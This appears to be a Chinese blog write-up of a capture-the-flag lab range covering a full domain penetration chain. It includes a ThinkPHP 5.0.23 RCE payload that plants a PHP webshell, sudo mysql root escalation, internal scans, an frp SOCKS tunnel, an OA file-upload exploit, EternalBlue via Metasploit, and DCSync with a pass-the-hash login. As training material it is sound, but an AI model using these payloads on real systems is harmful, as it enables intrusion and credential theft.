春秋云镜Initial
今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识,和tp——cve的漏洞成因吧
thinkphp5.23rce漏洞
再路由随便传参数?s=asdwdwa就会发生报错,通过报错可以发现该think版本为5.23
其漏洞payload如下1
2
3GET /?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php
我们直接写马通过哥斯拉来连接
其权限为www-data。我们先进行常规提权。
先尝试suid提权并没有发现可以利用的命令
再尝试进行sudo提权
可以发现我们能够无密码使用mysql
我这里贴一个sudo提权的文章
Linux提权之Sudo 70种提权方法(上)
Linux提权之Sudo 70种提权方法(中)
Linux提权之Sudo 70种提权方法(下)
Linux提权之Sudo 70种提权方法
上面的文章记录了70种sudo提权的方法
我们这里使用mysql提权
payload1
sudo mysql -e '\! HVV.out'
我们可以使用如上payload来以root权限运行我们的CS马从而上线root权限的liunx主机。
然后这道题目说了flag散落再不同的主机下。于是我们执行find / -name "flag"
来找flag
然后按照内网渗透的标准流程
ifconfig可以知道该主机ip为172.22.1.15
传netspy和fscan来扫内网的可达网段和资产1
2
3./fscan -h 172.22.1.15/24
./fscan -h 172.22.1.15/16
./netspy is
fscan的扫描结果如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70172.22.1.2:88 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.18:445 open
172.22.1.2:135 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.21:139 open
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
172.22.1.18:3306 open
172.22.1.2:445 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:139 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:135 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.2:88 open
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
我们可以发现信呼协同办公系统和一个XIAORANG-WIN7.xiaorang.lab域内主机172.22.1.21存在永恒之蓝漏洞
我们先来大172.22.1.18的web系统
隧道
这里我用frp来搭隧道。配置如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21//frpc.ini
[common]
server_addr = ip
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 6000
plugin = socks5
plugin_user = admin
plugin_passwd = admin123
use_encryption = true
use_compression = true
//frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = password
运行frps -c frps.ini和frpc -c frpc.ini
就成功实现隧道的搭建了
然后用proxifier来进行全局代理,然后来对内网的网站进行渗透。
信呼协同办公系统
输入admin/admin123进入网站后台。在任务资源管理处存在文件上传漏洞
然后再访问1
/task.php?m=qcloudCos|runt&a=run&fileid=<id>
即可恢复php后缀名
webshell路径upload/2024-11/21_16581360.php
可以发现其权限为system。我们直接看文件就可以看flag了。
因为我的哥斯拉看中文好像有编码错误于是我就换了蚁剑
虽然拿到了flag但是我还是在想能不能上线CS结果发现这个靶机是不出网的。
我在网上看到了几种方法
https://blog.csdn.net/weixin_44480014/article/details/125207525
通过Pystinger的socks4来做正向代理
因为春秋云镜的靶机太贵了,之后有时间我会在自己的本地搭环境来继续实验的
域内主机的永恒之蓝
我们通过msf来打这个永恒之蓝1
vim /etc/proxychains4.conf
我们先配置kali的proxychains4代理设置
配置好密码后就可以使用msfconsole来打永恒之蓝了1
2
3
4
5proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
得到该主机的Meterpreter 会话
然后就是打xiaorang.lab的域控了
这里使用的是
DCSync攻击:
DCSync的原理是利用域控制器之间的数据同步复制
DCSync是AD域渗透中常用的凭据窃取手段,默认情况下,域内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台域控中的域用户密码进行复制,DCSync就是利用这个原理,“模拟”DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆域控或者在域控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式
DCSync 攻击前提:
想进行DCSync 攻击,必须获得以下任一用户的权限:
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限
我们在获得的MS17-010这台机器加载mimikatz,并且本机是system权限
因为我们获得的机子权限已经为system权限了所有我们可以使用kiwi来对其进行DCSync攻击1
2load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
得到域控主机管理员的用户凭证
然后我们就可以尝试使用crackmapexec来登陆域控admin进行命令执行1
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"
后面我也想对这个靶机进行cs上线,但是仍然不出网。
因为春秋云镜有点小贵我就把靶机关了
个人的思路是,通过正向代理来把信呼协同办公系统的靶机进行cs上线在通过信呼协同办公系统的机子作为跳板(作为监听器)来上线域内主机,然后进一步上线域控主机
这些我还需要再进一步的学习,还是因为囊中羞涩所以要再本地自主学习
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
